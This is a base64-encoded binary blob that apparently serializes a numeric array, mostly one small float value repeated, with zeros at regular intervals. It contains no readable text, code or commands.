+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+J